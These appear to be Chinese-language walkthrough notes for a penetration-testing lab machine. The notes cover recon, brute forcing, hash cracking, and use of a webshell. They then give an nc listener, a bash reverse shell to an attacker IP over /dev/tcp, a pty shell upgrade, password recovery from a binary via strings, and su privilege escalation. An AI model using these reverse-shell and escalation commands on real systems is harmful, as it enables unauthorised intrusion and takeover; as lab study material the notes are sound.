sparta信息探测工具
暴力破解
页面敏感信息
gedit hash.txt
crackstation验证码显示不出来,无法破解,找了半天也没找到好的免费的可以免费破解的网站,只好一个一个破解
只有最后两条可以破解
登陆之后再打开dev的webshell就可以打开
nc -nlvp 4444启动监听
反弹shell
echo 'bash -i >& /dev/tcp/192.168.1.105攻击机ip地址/4444 0>&1' | bash
优化终端
python -c "import pty;pty.spawn('/bin/bash')"
从反弹shell的目录开始查找,依次向上级目录查找敏感文件
发现敏感目录.hiddenadmindirectory
strings 文件名 查看敏感字符串
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
去掉每行最后的H即可得到密码
SUPERultimatePASSWORDyouCANTget
找到密码后,执行su,提权